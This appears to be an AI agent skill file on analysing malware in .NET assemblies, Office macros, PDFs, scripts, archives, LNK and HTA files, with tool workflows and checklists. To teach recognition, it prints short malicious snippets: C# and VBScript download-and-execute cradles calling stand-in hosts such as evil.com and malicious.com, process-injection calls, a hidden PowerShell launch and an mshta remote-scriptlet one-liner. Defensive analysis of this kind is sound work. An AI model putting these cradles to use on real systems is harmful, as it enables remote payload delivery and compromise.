---
name: specialized-file-analyzer
description: Analyze specialized file types beyond standard PE executables - .NET assemblies, Office macros, PDFs, PowerShell scripts, JavaScript, archives, HTA files, disk images (ISO/IMG/VHD/VHDX), and Linux ELF binaries. Use when you encounter documents, scripts, disk images, or non-Windows executables that require format-specific analysis tools and techniques.
---
# Specialized File Analyzer
Expert analysis of non-PE file formats commonly used in malware campaigns: .NET, Office documents, PDFs, scripts, HTA files, disk images, archives, and Linux binaries.
## When to Use This Skill
Use this skill when analyzing:
- **.NET/C# assemblies** (.exe, .dll with .NET framework)
- **Office documents** with macros (.docm, .xlsm, .doc, .xls)
- **PDF files** (suspicious attachments, exploit documents)
- **Scripts** (PowerShell .ps1, VBScript .vbs, JavaScript .js)
- **HTA files** (.hta — HTML Applications executed by mshta.exe)
- **Disk images** (.iso, .img, .vhd, .vhdx — container formats that bypass MOTW)
- **Archives** (.zip, .rar, .7z, .tar.gz)
- **Shortcuts** (.lnk files)
- **Linux binaries** (ELF executables)
- **Batch files** (.bat, .cmd)
**Key indicator:** the `file` command reports a document, script, archive, disk image, ELF binary, or a PE flagged as a Mono/.Net assembly rather than a native PE.
## Quick File Type Identification
```bash
# Identify file type
file sample.bin
# Common outputs:
# "PE32+ console executable, for MS Windows" → Standard PE (use malware-triage)
# "PE32 executable (GUI) Intel 80386 Mono/.Net assembly" → .NET (use this skill)
# "Microsoft Office Document" → Office macro (use this skill)
# "PDF document, version 1.7" → PDF (use this skill)
# "HTML document text" → Check extension; if .hta → HTA (use this skill)
# "ISO 9660 CD-ROM filesystem data" → ISO image (use this skill)
# "DOS/MBR boot sector" → IMG disk image (use this skill)
# "Microsoft Disk Image" → VHD/VHDX (use this skill)
# "Zip archive data" → Archive (use this skill)
# "ELF 64-bit LSB executable" → Linux binary (use this skill)
# "ASCII text, with CRLF line terminators" → Script (use this skill)
```
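When `file` is not available (for example on a Windows analysis host), the same first-pass identification can be approximated by comparing leading bytes against known signatures. The sketch below is illustrative only: the `MAGIC_SIGNATURES` table and `identify_magic` name are assumptions of this example, and the table is far from exhaustive.

```python
# Illustrative signature table (hypothetical helper, not part of any tool).
MAGIC_SIGNATURES = [
    (b"MZ", "PE/DOS executable (check for .NET separately)"),
    (b"\x7fELF", "ELF binary"),
    (b"%PDF-", "PDF document"),
    (b"PK\x03\x04", "ZIP container (archive or Office 2007+)"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (legacy Office)"),
    (b"Rar!\x1a\x07", "RAR archive"),
    (b"7z\xbc\xaf\x27\x1c", "7-Zip archive"),
    (b"\x1f\x8b", "gzip stream"),
    (b"L\x00\x00\x00\x01\x14\x02\x00", "Windows shortcut (LNK)"),
]


def identify_magic(data: bytes) -> str:
    """Return a coarse file-type label based on leading magic bytes."""
    for magic, label in MAGIC_SIGNATURES:
        if data.startswith(magic):
            return label
    # ISO 9660 keeps its "CD001" marker at offset 0x8001, not at the start.
    if data[0x8001:0x8006] == b"CD001":
        return "ISO 9660 disk image"
    return "unknown (likely text or script; inspect manually)"
```

Reading the first 64 KiB of the sample is enough for every signature in this table, including the ISO 9660 marker.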
---
## .NET / C# Assembly Analysis
### Detection
```bash
# Check for .NET assembly
file sample.exe | grep "Mono/.Net assembly"
# Or check strings
strings sample.exe | grep "mscoree.dll"
# Check PE header
pe-parser sample.exe | grep "CLR Runtime"
```
### Tool: dnSpy (Windows - Primary Tool)
**Download:** https://github.com/dnSpy/dnSpy
**Workflow:**
1. Open sample.exe in dnSpy
2. Navigate: Assembly Explorer → sample.exe → Namespace → Classes
3. Find entry point: Right-click assembly → Go to Entry Point
**What to Look For:**
**Main() Function:**
```csharp
// Entry point - start here
public static void Main(string[] args)
{
// Analyze execution flow
}
```
**Suspicious Namespaces:**
- `System.Net` - Network operations (WebClient, HttpClient)
- `System.Security.Cryptography` - Encryption/decryption
- `System.Reflection` - Dynamic code loading
- `System.Diagnostics.Process` - Process execution
- `System.IO` - File operations
- `Microsoft.Win32` - Registry access
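
Before opening a decompiler, a rough check for these namespaces can be done on the raw bytes. This is a minimal sketch, assuming metadata names appear as UTF-8 and string literals as UTF-16LE; `SUSPICIOUS_NAMESPACES` and `find_namespaces` are hypothetical names, and an obfuscated sample may hide or rename everything this looks for.

```python
# Namespace list mirrors the bullets above; System.Diagnostics is used because
# the Process type name is stored separately from its namespace.
SUSPICIOUS_NAMESPACES = [
    "System.Net",
    "System.Security.Cryptography",
    "System.Reflection",
    "System.Diagnostics",
    "System.IO",
    "Microsoft.Win32",
]


def find_namespaces(data: bytes) -> list[str]:
    """Return the suspicious namespaces whose names occur in the raw bytes."""
    hits = []
    for ns in SUSPICIOUS_NAMESPACES:
        # Check both encodings: UTF-8 (metadata) and UTF-16LE (user strings).
        if ns.encode("utf-8") in data or ns.encode("utf-16-le") in data:
            hits.append(ns)
    return hits
```

A hit only means the name is present; most benign .NET programs reference several of these namespaces, so treat the result as a pointer for where to look in dnSpy.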
**Common Malicious Patterns:**
```csharp
// Download and execute
WebClient wc = new WebClient();
wc.DownloadFile("http://malicious.com/payload.exe", "C:\\temp\\payload.exe");
Process.Start("C:\\temp\\payload.exe");
// Base64 decode embedded payload
byte[] decoded = Convert.FromBase64String(encodedPayload);
// Reflective loading (rawAssembly is a byte[] holding the decoded assembly)
Assembly.Load(rawAssembly);
// Process injection (WriteProcessMemory is a kernel32.dll P/Invoke)
WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, out lpNumberOfBytesWritten);
```
**Extract Embedded Resources:**
```
Assembly Explorer → Right-click assembly → Resources
Look for:
- Embedded executables (byte arrays)
- Encrypted payloads
- Configuration data
- Icons (may hide data)
Right-click resource → Save
```
**Deobfuscation:**
```bash
# Using de4dot (automated deobfuscator)
de4dot sample.exe -o sample_deobfuscated.exe
# Handles common obfuscators:
# - ConfuserEx
# - .NET Reactor
# - Eazfuscator
# - Agile.NET
```
**Dynamic Debugging:**
```
dnSpy: Debug → Start Debugging (F5)
Set breakpoints on suspicious functions
Step through execution (F10/F11)
Watch variables and decrypted strings
```
### Tool: ILSpy (Cross-platform Alternative)
```bash
# Command-line decompilation
ilspycmd sample.exe -o output_directory/
# GUI version (Windows/Linux/Mac)
ilspy sample.exe
```
**Export decompiled code:**
```
File → Save Code → C# Project
```
### Analysis Checklist - .NET
- [ ] Entry point identified (Main function)
- [ ] Obfuscation detected and removed (if needed)
- [ ] Embedded resources extracted
- [ ] Network URLs/IPs extracted
- [ ] Crypto keys identified
- [ ] Anti-analysis checks found
- [ ] Payload execution method documented
- [ ] IOCs extracted (URLs, IPs, file paths)
---
## Office Document / Macro Analysis
### Detection
```bash
# Macro-enabled formats
# .docm, .xlsm, .pptm → Office 2007+ with macros
# .doc, .xls, .ppt → Legacy Office (97-2003) with macros
file document.docm
# Output: "Microsoft Word 2007+"
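# Quick macro check (.docm/.xlsm are ZIP containers, so list the parts)
unzip -l document.docm | grep -i "vbaProject.bin"
# Legacy OLE formats (.doc/.xls) can be searched with strings
strings document.doc | grep -i "vba\|macro\|autoopen"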
```
### Tool: oledump.py (Primary - Didier Stevens)
**Installation:**
```bash
wget https://didierstevens.com/files/software/oledump_V0_0_70.zip
unzip oledump_V0_0_70.zip
```
**Workflow:**
**1. List Streams:**
```bash
python oledump.py document.docm
# Example output:
# 1: 114 '\x01CompObj'
# 2: 4096 '\x05DocumentSummaryInformation'
# 3: M 8192 'Macros/VBA/ThisDocument' ← Macro present (M indicator)
# 4: m 1024 'Macros/VBA/_VBA_PROJECT'
# 5: M 4096 'Macros/VBA/Module1'
```
**2. Extract Macro Code:**
```bash
# Extract macro from stream 3
python oledump.py -s 3 -v document.docm
# Decompress corrupted VBA
python oledump.py -s 3 --vbadecompresscorrupt document.docm
# Save to file
python oledump.py -s 3 -v document.docm > extracted_macro.vba
```
**3. Analyze Macro Code:**
Look for **Auto-Execution Functions:**
```vba
Sub AutoOpen() ' Word - runs on document open
Sub Document_Open() ' Word - runs on document open
Sub Workbook_Open() ' Excel - runs on workbook open
Sub Auto_Open() ' Excel - runs on workbook open
```
Look for **Suspicious VBA Functions:**
```vba
' Command execution
Shell("cmd.exe /c powershell ...")
CreateObject("WScript.Shell").Run "..."
' File download
CreateObject("MSXML2.XMLHTTP")
URLDownloadToFile ...
' File system operations
CreateObject("Scripting.FileSystemObject")
' Dynamic code execution
ExecuteStatement
Eval()
CallByName()
```
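Once the macro source is saved to a file, the two keyword lists above can be checked in one pass. The following is a sketch under the assumption that the source is plain text as produced by `oledump.py -v`; `triage_vba` and both keyword lists are hypothetical names for this example, and olevba performs a far more complete version of this check.

```python
import re

AUTOEXEC = ["AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open"]
SUSPICIOUS = ["Shell", "WScript.Shell", "MSXML2.XMLHTTP",
              "URLDownloadToFile", "Scripting.FileSystemObject", "CallByName"]


def triage_vba(source: str) -> dict[str, list[str]]:
    """Report which auto-execution and suspicious keywords occur in VBA source."""
    def present(keyword: str) -> bool:
        # Whole-token match, case-insensitive because VBA ignores case.
        # The lookbehind also rejects a leading dot so that "WScript.Shell"
        # is not double-counted as a bare Shell() call.
        pattern = r"(?<![\w.])" + re.escape(keyword) + r"(?!\w)"
        return re.search(pattern, source, re.IGNORECASE) is not None

    return {
        "autoexec": [k for k in AUTOEXEC if present(k)],
        "suspicious": [k for k in SUSPICIOUS if present(k)],
    }
```

Keyword matching is defeated by string obfuscation (for example `"WScr" & "ipt.Shell"`), so an empty result does not clear a macro.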
### Tool: olevba (oletools Suite)
**Installation:**
```bash
pip install oletools
```
**Automated Analysis:**
```bash
# Comprehensive analysis
olevba document.docm
# Decode obfuscated strings
olevba --decode document.docm
# JSON output for parsing
olevba -j document.docm > analysis.json
# Extract IOCs only
olevba --decode document.docm | grep -E "http|https|powershell|cmd|wscript"
```
**Output Interpretation:**
- **AutoExec** - Auto-execution keywords found
- **Suspicious** - Suspicious VBA keywords
- **IOCs** - URLs, IPs, file paths
- **Hex Strings** - Encoded data
- **Base64 Strings** - Encoded payloads
- **Dridex Strings** - Dridex malware indicators
### Excel 4.0 Macros (XLM Macros)
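**More evasive than VBA macros:** XLM macros live in worksheet cells rather than in a VBA project, so VBA-focused tooling and signatures often miss them.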
```bash
# Detect XLM macros
python oledump.py document.xls | grep XL
# Extract with XLMMacroDeobfuscator (https://github.com/DissectMalware/XLMMacroDeobfuscator)
pip install XLMMacroDeobfuscator
xlmdeobfuscator --file document.xls
# Or use olevba
olevba document.xls --deobf
```
### Modern Office Documents (.docx, .xlsx) - No Macros
**Template Injection Attack:**
```bash
# Extract Office Open XML structure
unzip document.docx -d extracted/
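# Check for external template (the attachedTemplate relationship usually lives in settings.xml.rels)
grep -r 'TargetMode="External"' extracted/word/_rels/
# Look for:
# a Relationship whose Type ends in "/attachedTemplate" and whose Target is a remote URL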
```
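The relationship files are small XML documents, so external targets can also be listed programmatically. This is a minimal sketch using the standard-library parser; `external_targets` is a hypothetical helper, and for hostile input a hardened XML parser may be preferable.

```python
import xml.etree.ElementTree as ET

# Namespace used by OOXML package relationship (.rels) parts.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_targets(rels_xml: str) -> list[tuple[str, str]]:
    """Return (relationship type, target) pairs marked TargetMode="External"."""
    root = ET.fromstring(rels_xml)
    found = []
    for rel in root.iter(RELS_NS + "Relationship"):
        if rel.get("TargetMode") == "External":
            # Keep only the last path segment of Type, e.g. "attachedTemplate".
            rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
            found.append((rel_type, rel.get("Target", "")))
    return found
```

Run it over every `.rels` file under `extracted/`; ordinary hyperlinks also appear as external relationships, so the type field is what separates a benign link from a remote template.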
**Embedded Objects:**
```bash
# Check for embedded files
ls extracted/word/embeddings/
# Analyze embedded objects
file extracted/word/embeddings/*
```
### Analysis Checklist - Office Documents
- [ ] Macro presence confirmed
- [ ] All macro streams extracted
- [ ] Auto-execution functions identified
- [ ] Obfuscated strings decoded
- [ ] Download URLs extracted
- [ ] Payload execution method documented
- [ ] External template checked (.docx/.xlsx)
- [ ] Embedded objects analyzed
- [ ] IOCs extracted and defanged
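
Defanging keeps extracted indicators from being clicked or auto-linked in a report. The helper below is one possible convention, not a standard: `defang` is a hypothetical name, and it rewrites every dot (including those in the path) rather than only the host portion.

```python
import re


def defang(ioc: str) -> str:
    """Rewrite a URL, domain, or IP so it is no longer clickable."""
    # http/https -> hxxp/hxxps
    ioc = re.sub(r"^http", "hxxp", ioc, flags=re.IGNORECASE)
    # Break every dot so hostnames and IPs are not auto-linked.
    return ioc.replace(".", "[.]")
```

For example, `defang("http://evil.com/payload.exe")` yields `hxxp://evil[.]com/payload[.]exe`.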
---
## PDF Analysis
### Detection
```bash
file document.pdf
# Output: "PDF document, version 1.7"
```
### Tool: pdfid.py (Didier Stevens)
**Quick Triage:**
```bash
python pdfid.py document.pdf
# Red flags:
# /OpenAction - Executes action on open
# /AA - Additional actions (auto-execute)
# /JavaScript - Embedded JavaScript
# /JS - JavaScript (short form)
# /Launch - Launch external program
# /EmbeddedFile - Embedded files
# /RichMedia - Flash/multimedia content
# /ObjStm - Object streams (can hide malicious content)
```
**Example Output:**
```
PDFiD 0.2.7 document.pdf
PDF Header: %PDF-1.7
obj 45
endobj 45
stream 12
endstream 12
/Page 5
/Encrypt 0
/ObjStm 0
/JS 3 ← Suspicious!
/JavaScript 2 ← Suspicious!
/AA 1 ← Auto-action present!
/OpenAction 1 ← Executes on open!
/Launch 0
/EmbeddedFile 0
/RichMedia 0
```
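The counts above come from scanning the raw file for PDF name tokens. A simplified version of that idea is sketched below; `count_pdf_keywords` is a hypothetical helper and, unlike pdfid, it does not handle hex-escaped names (such as `/J#53`) or keywords hidden inside compressed object streams.

```python
import re

KEYWORDS = ["/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch",
            "/EmbeddedFile", "/RichMedia", "/ObjStm"]


def count_pdf_keywords(data: bytes) -> dict[str, int]:
    """Count occurrences of risky PDF name tokens in raw file bytes."""
    counts = {}
    for kw in KEYWORDS:
        # A PDF name ends at whitespace or a delimiter, so require that the
        # next byte is not alphanumeric (keeps /AA from matching /AAPL).
        pattern = re.escape(kw.encode("ascii")) + rb"(?![A-Za-z0-9])"
        counts[kw] = len(re.findall(pattern, data))
    return counts
```

Any non-zero count for `/OpenAction`, `/AA`, `/JS`, or `/Launch` is a reason to move on to pdf-parser.py for the object-level view.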
### Tool: pdf-parser.py (Didier Stevens)
**Extract JavaScript:**
```bash
# Search for JavaScript objects
python pdf-parser.py --search javascript document.pdf
# Extract specific object
python pdf-parser.py --object 15 document.pdf
# Dump JavaScript code
python pdf-parser.py --object 15 --raw document.pdf > extracted_js.txt
# Filter streams
python pdf-parser.py --filter document.pdf
```
### Tool: peepdf (Interactive Analysis)
```bash
# Install (peepdf-3 is the Python 3 compatible fork)
pip install peepdf-3
# Interactive mode
peepdf -i document.pdf
# Commands in interactive shell:
> tree # Show object structure
> object 15 # Inspect object 15
> stream 15 # View stream 15
> extract js # Extract all JavaScript
> stream 15 > payload.bin # Redirect decoded stream 15 to a file
```
### PDF Exploits
**Common CVEs:**
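- **CVE-2013-2729** - Adobe Reader integer overflow, typically exploited together with a JavaScript heap spray
- **CVE-2010-0188** - libtiff buffer overflow
- **CVE-2009-0927** - `Collab.getIcon()` JavaScript stack buffer overflow (the JBIG2Decode overflow is CVE-2009-0658)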
- **CVE-2023-21608** - Adobe Acrobat use-after-free (remote code execution)
- **CVE-2023-26369** - Adobe Acrobat out-of-bounds write (actively exploited in the wild)
- **CVE-2024-4367** - PDF.js arbitrary JavaScript execution in Firefox (affects web-based PDF viewers)
- **CVE-2023-36664** - Ghostscript command injection via crafted PDF (affects Linux/server-side rendering)
**Shellcode Detection:**
```bash
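# Count NOP-sled matches in decoded streams (-a treats binary as text, -P enables \x escapes)
python pdf-parser.py --filter --raw document.pdf | LC_ALL=C grep -aPc '\x90{10}'
# Hex-dump one suspicious object (15 is an example object number)
python pdf-parser.py --object 15 --filter --raw document.pdf | hexdump -C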
```
### Analysis Checklist - PDF
- [ ] pdfid scan completed (flags identified)
- [ ] JavaScript extracted (if present)
- [ ] Embedded files extracted
- [ ] Auto-action mechanism documented
- [ ] Shellcode indicators checked
- [ ] CVE exploitation checked (if relevant)
- [ ] URLs/IPs extracted from JS
- [ ] IOCs documented
---
## PowerShell / Script Analysis
### PowerShell (.ps1) Deobfuscation
**Common Obfuscation Patterns:**
**Base64 Encoding:**
```powershell
# Encoded command execution
powershell.exe -EncodedCommand
# Decode manually
$encoded = "Base64StringHere"
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
```
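The same decoding can be done off-box without a PowerShell host. `-EncodedCommand` expects Base64 over UTF-16LE text, which is what the sketch below assumes; `decode_encoded_command` is a hypothetical helper name.

```python
import base64


def decode_encoded_command(b64_text: str) -> str:
    """Decode the argument of powershell.exe -EncodedCommand."""
    raw = base64.b64decode(b64_text)
    # PowerShell encodes the command as UTF-16LE before Base64.
    return raw.decode("utf-16-le")
```

For example, `decode_encoded_command("dwBoAG8AYQBtAGkA")` returns `whoami`. If decoding yields mojibake, the string may be a payload blob rather than a command line.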
**String Concatenation:**
```powershell
$url = "ht" + "tp://" + "evil.com"
```
**Compression:**
```powershell
$ms = New-Object IO.MemoryStream
$ms.Write([Convert]::FromBase64String($compressed), 0, $compressedLength)
$ms.Seek(0,0) | Out-Null
$cs = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
```
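A Base64 plus GZip layer like the one above can be peeled statically. This sketch assumes the blob is a standard gzip stream; `decode_gzip_b64` is a hypothetical helper name.

```python
import base64
import gzip


def decode_gzip_b64(b64_text: str, encoding: str = "utf-8") -> str:
    """Base64-decode, then gunzip, an embedded PowerShell payload."""
    compressed = base64.b64decode(b64_text)
    # errors="replace" keeps going if the inner stage is not clean text.
    return gzip.decompress(compressed).decode(encoding, errors="replace")
```

Samples that use `DeflateStream` instead of `GZipStream` carry raw deflate data, which `zlib.decompress(data, -15)` handles rather than `gzip.decompress`.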
### Tool: PSDecode
```powershell
# Install
git clone https://github.com/R3MRUM/PSDecode
# Deobfuscate PowerShell
Import-Module .\PSDecode.ps1
PSDecode -InputFile malicious.ps1 -OutputFile decoded.txt
```
**Manual Analysis:**
```powershell
# Read script without executing
Get-Content malicious.ps1
# Search for key indicators
Select-String -Path malicious.ps1 -Pattern "Invoke-Expression|IEX|DownloadString|DownloadFile|FromBase64String"
```
**Suspicious PowerShell Patterns:**
- `Invoke-Expression` / `IEX` - Execute string as code
- `Invoke-WebRequest` / `Invoke-RestMethod` - Download content
- `DownloadString` / `DownloadFile` - Download payloads
- `FromBase64String` - Decode embedded payload
- `IO.Compression.GZipStream` - Decompress payload
- `[Reflection.Assembly]::Load` - Load assembly from memory
- `-EncodedCommand` - Base64 encoded command
- `-WindowStyle Hidden` - Hide window
- `-ExecutionPolicy Bypass` - Bypass script execution policy
### VBScript (.vbs) Analysis
**Common Obfuscation Techniques:**
**Chr() Concatenation:**
```vbs
' Characters assembled from ASCII codes to hide strings
Dim cmd
cmd = Chr(99) & Chr(109) & Chr(100) ' = "cmd"
CreateObject("WScript.Shell").Run cmd & ".exe /c " & Chr(112) & Chr(105) & Chr(110) & Chr(103) & " evil.com"
```
**Execute / ExecuteGlobal:**
```vbs
' Execute() runs a string as code in the current scope
' ExecuteGlobal() runs a string as code in the global scope
Dim payload
payload = "CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ").Run " & Chr(34) & "calc.exe" & Chr(34)
Execute(payload)
' Chained: decode then execute (Base64Decode is a helper defined by the sample, not a VBScript built-in)
ExecuteGlobal(Base64Decode(encodedPayload))
```
**String Reversal with StrReverse:**
```vbs
' String stored backwards to evade signature detection
Dim hidden
hidden = "elbatius/c/ exe.dmc"
CreateObject("WScript.Shell").Run StrReverse(hidden)
```
**Replace() Chains:**
```vbs
' Junk characters inserted and stripped at runtime
Dim url
url = "hXXXtXXXtXXXpXXX:XXX//evil.com/payload.exe"
url = Replace(url, "XXX", "") ' = "http://evil.com/payload.exe"
```
**WScript.Shell via GetObject:**
```vbs
' Alternative to CreateObject — avoids direct string "WScript.Shell"
Set sh = GetObject("new:{72C24DD5-D70A-438B-8A42-98424B88AFB8}")
sh.Run "powershell -nop -w hidden -enc "
```
**Deobfuscation Approach:**
**Manual Chr() Resolution:**
```bash
# Extract all Chr() calls and resolve them
grep -oE "Chr\([0-9]+\)" malicious.vbs | sort -u
# Python one-liner to resolve Chr values from grep output
python3 -c "
import re, sys
code = open('malicious.vbs').read()
for m in re.finditer(r'Chr\((\d+)\)', code):
    print(f'Chr({m.group(1)}) = {chr(int(m.group(1)))}')
"
```
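Resolving each `Chr()` call individually still leaves the analyst to reassemble the strings. A small rewrite pass can fold whole `Chr(..) & Chr(..)` chains into string literals in place. This is a sketch only: `resolve_chr_chains` is a hypothetical helper, and it ignores `ChrW()`, arithmetic inside the parentheses, and chains mixed with variables.

```python
import re

# One or more Chr(n) calls joined by the VBScript concatenation operator.
CHR_CHAIN = re.compile(r"Chr\(\d+\)(?:\s*&\s*Chr\(\d+\))*", re.IGNORECASE)


def resolve_chr_chains(code: str) -> str:
    """Replace Chr(n) & Chr(m) ... chains with the equivalent string literal."""
    def fold(match: re.Match) -> str:
        codes = re.findall(r"\d+", match.group(0))
        text = "".join(chr(int(c)) for c in codes)
        # VBScript escapes a double quote inside a literal by doubling it.
        return '"' + text.replace('"', '""') + '"'

    return CHR_CHAIN.sub(fold, code)
```

Applied to `cmd = Chr(99) & Chr(109) & Chr(100)`, the result is `cmd = "cmd"`, which makes the surrounding `Run` call readable without executing anything.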
**Extract Execute() Payloads:**
```vbs
' SAFE deobfuscation technique:
' Replace Execute() / ExecuteGlobal() with WScript.Echo() to print payload instead of running it
' Original:
Execute(decodedPayload)
' Change to:
WScript.Echo(decodedPayload)
' Then run in a safe environment to reveal the next stage:
'   cscript /nologo malicious_safe.vbs
```
**Variable Substitution Tracing:**
```bash
# Trace variable assignments to follow payload construction
grep -n "=" malicious.vbs | grep -v "'.*=" # exclude comments
# Follow each variable from assignment to use, reconstructing the final value
```
**Key Suspicious Patterns:**
- `CreateObject("WScript.Shell")` - Execute OS commands, launch processes
- `GetObject("winmgmts:")` - WMI access (process creation, system enumeration)
- `Shell.Application` - Explorer shell invocation (can bypass some restrictions)
- `ADODB.Stream` - Binary file writes (used to drop PE payloads to disk)
- `MSXML2.XMLHTTP` / `WinHttp.WinHttpRequest` - HTTP download cradles
- `Scripting.FileSystemObject` - File system reads and writes
- `Execute` / `ExecuteGlobal` / `Eval` - Dynamic code execution (always deobfuscate before analyzing)
- `StrReverse` / `Chr()` / `Replace()` - String obfuscation primitives
**Analysis:**
```bash
# Read script
cat malicious.vbs
# Search for high-priority patterns
grep -i "CreateObject\|WScript.Shell\|MSXML2.XMLHTTP\|Eval\|Execute\|ExecuteGlobal\|ADODB.Stream\|GetObject\|StrReverse" malicious.vbs
# Deobfuscate: Replace Eval() / Execute() with WScript.Echo() to print instead of execute
# Then run safely: cscript /nologo malicious_safe.vbs
```
### JavaScript (.js) Analysis
```bash
# Beautify obfuscated JS
js-beautify malicious.js > beautified.js
# Online: https://beautifier.io/
```
**Suspicious Patterns:**
```javascript
// Code execution
eval(encodedCode);
// Decode strings
unescape("%75%6E%65%73%63%61%70%65");
decodeURIComponent("%20");
// ActiveX (Windows COM objects)
var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd.exe /c ...");
// WScript objects
var fso = new ActiveXObject("Scripting.FileSystemObject");
```
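Percent-encoded literals passed to `unescape()` or `decodeURIComponent()` can be decoded statically. The sketch below assumes the literal is a double-quoted run of `%XX` escapes; `decode_percent_literals` is a hypothetical helper, and `%uXXXX` escapes are not handled.

```python
import re
from urllib.parse import unquote

# A double-quoted string made up entirely of %XX escapes.
PERCENT_LITERAL = re.compile(r'"((?:%[0-9A-Fa-f]{2})+)"')


def decode_percent_literals(js: str) -> list[str]:
    """Decode every fully percent-encoded string literal found in JS source."""
    # latin-1 maps each %XX to one character, matching unescape() semantics.
    return [unquote(m.group(1), encoding="latin-1")
            for m in PERCENT_LITERAL.finditer(js)]
```

Run against the two decode examples above, this returns `unescape` and a single space.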
### Analysis Checklist - Scripts
- [ ] Script type identified (PS1, VBS, JS, BAT)
- [ ] Obfuscation detected and removed
- [ ] Base64/encoded strings decoded
- [ ] Download URLs extracted
- [ ] Execution commands documented
- [ ] Dropped file paths identified
- [ ] IOCs extracted (URLs, IPs, domains)
---
## Archive Analysis
### Safe Inspection (No Extraction)
```bash
# List contents without extracting
7z l archive.zip
unzip -l archive.zip
tar -tzf archive.tar.gz
rar l archive.rar
# Look for red flags:
# - Double extensions (invoice.pdf.exe)
# - Executable files (.exe, .scr, .com, .bat, .vbs)
# - LNK files (shortcuts)
# - Deeply nested archives (archive.zip -> archive2.zip -> payload.exe)
```
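The red-flag checks on a listing can be automated for ZIP files without extracting anything. This is a minimal sketch: `flag_member`, `flag_zip`, and both extension sets are assumptions of this example, and nested-archive detection is left out.

```python
import zipfile
from pathlib import PurePosixPath

RISKY_EXTENSIONS = {".exe", ".scr", ".com", ".bat", ".vbs", ".lnk", ".js", ".hta"}
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".txt"}


def flag_member(name: str) -> list[str]:
    """Return red flags for one archive member name."""
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    flags = []
    if suffixes and suffixes[-1] in RISKY_EXTENSIONS:
        flags.append("executable-or-script")
        # A document-like extension right before the real one is a lure.
        if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTENSIONS:
            flags.append("double-extension")
    return flags


def flag_zip(path: str) -> dict[str, list[str]]:
    """Map flagged member names to their flags; reads the listing only."""
    flagged = {}
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            flags = flag_member(name)
            if flags:
                flagged[name] = flags
    return flagged
```

`flag_zip` only reads the central directory, so it is safe to run before deciding whether to extract.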
### Extract Safely
```bash
# Create isolated directory
mkdir /tmp/extracted_archive
cd /tmp/extracted_archive
# Extract
7z x ../archive.zip
unzip ../archive.zip
tar -xzf ../archive.tar.gz
# Immediately check file types
file *
```
### Password-Protected Archives
**Common passwords in malware:**
- `infected`
- `malware`
- `virus`
- `2024` / `2025`
- `123456`
```bash
# Extract with password
7z x -pinfected archive.zip
unzip -P infected archive.zip
```
### LNK (Shortcut) File Analysis
**Tool: LECmd (Windows)**
```powershell
# Download from: https://ericzimmerman.github.io/
LECmd.exe -f malicious.lnk
```
**Tool: lnkinfo (Linux)**
```bash
lnkinfo malicious.lnk
# Look for:
# - Target path (what it executes)
# - Command-line arguments
# - Working directory
# - Icon location (may reveal payload location)
```
**Manual Strings Analysis:**
```bash
strings malicious.lnk | grep -E "\.exe|\.dll|http|powershell|cmd"
```
### Analysis Checklist - Archives
- [ ] Contents listed without extraction
- [ ] File extensions verified (no double extensions)
- [ ] Files extracted to isolated directory
- [ ] All extracted files typed (file command)
- [ ] LNK files analyzed (if present)
- [ ] Nested archives checked
- [ ] Password documented (if applicable)
---
## HTA (HTML Application) Analysis
### What HTA Files Are
HTA files (`.hta`) are HTML documents executed by `mshta.exe` (Microsoft HTML Application Host) rather than a web browser. HTAs run as trusted applications with the full privileges of the current user and have unrestricted access to COM objects, ActiveX controls, and the local file system; none of the browser sandbox restrictions apply. Because `mshta.exe` is a signed Windows binary, it is also frequently allowed by application control policies. This makes HTAs a popular delivery vehicle for malware, often distributed via phishing emails or dropped inside ISO/ZIP archives.
**MITRE ATT&CK: T1218.005 — System Binary Proxy Execution: Mshta**
### Detection
```bash
# File identification
file suspicious.hta
# Output: "HTML document text" (always verify the extension separately)
# Quick check for execution indicators
strings suspicious.hta | grep -iE "mshta|WScript|Shell|ActiveX|XMLHTTP|powershell"
```
### Analysis Approach
HTAs are plain text — open them in any text editor or IDE. The analysis goal is to extract and understand all embedded scripts before any execution occurs.
**1. Extract Embedded Scripts**
```bash
# View raw content
cat suspicious.hta
# Grep for script blocks
grep -in "<script" suspicious.hta
```
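For larger HTAs it can help to pull each script block out with its declared language so VBScript and JScript can be reviewed separately. The sketch below uses regular expressions rather than a full HTML parser, which is an assumption that holds for typical samples but not for deliberately malformed markup; `extract_script_blocks` is a hypothetical helper.

```python
import re

SCRIPT_BLOCK = re.compile(
    r"<script\b([^>]*)>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL
)
LANGUAGE_ATTR = re.compile(r"""language\s*=\s*["']?([\w.]+)""", re.IGNORECASE)


def extract_script_blocks(hta_text: str) -> list[tuple[str, str]]:
    """Return (language, body) for every script element in an HTA."""
    blocks = []
    for attrs, body in SCRIPT_BLOCK.findall(hta_text):
        lang = LANGUAGE_ATTR.search(attrs)
        # Leave the language as "unspecified" rather than guessing a default.
        blocks.append((lang.group(1) if lang else "unspecified", body.strip()))
    return blocks
```

Each extracted body can then be fed to the VBScript or JavaScript techniques described in the script analysis section.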
**mshta.exe executing inline script (seen in phishing URLs):**
```
mshta.exe javascript:a=(GetObject("script:http://malicious[.]com/payload.sct")).Exec();close();
```
### Tools
| Task | Tool |
|------|------|
| Read/edit HTA content | Any text editor (VS Code, Notepad++, vim) |
| DOM structure inspection | Browser dev tools (open as HTML — do NOT click Run) |
| Decode base64 strings | `base64 -d` (Linux), CyberChef |
| Chr()/VBS deobfuscation | Manual or `cscript` with Execute→Echo swap (see VBScript section) |
| Trace COM object calls | Process Monitor (filter on mshta.exe) — dynamic analysis VM only |
### Analysis Checklist - HTA
- [ ] File opened as plain text — script language identified (VBScript / JScript / mixed)
- [ ] All `CreateObject` / `new ActiveXObject` calls enumerated
- [ ] `Shell.Run` / `ShellExecute` arguments extracted
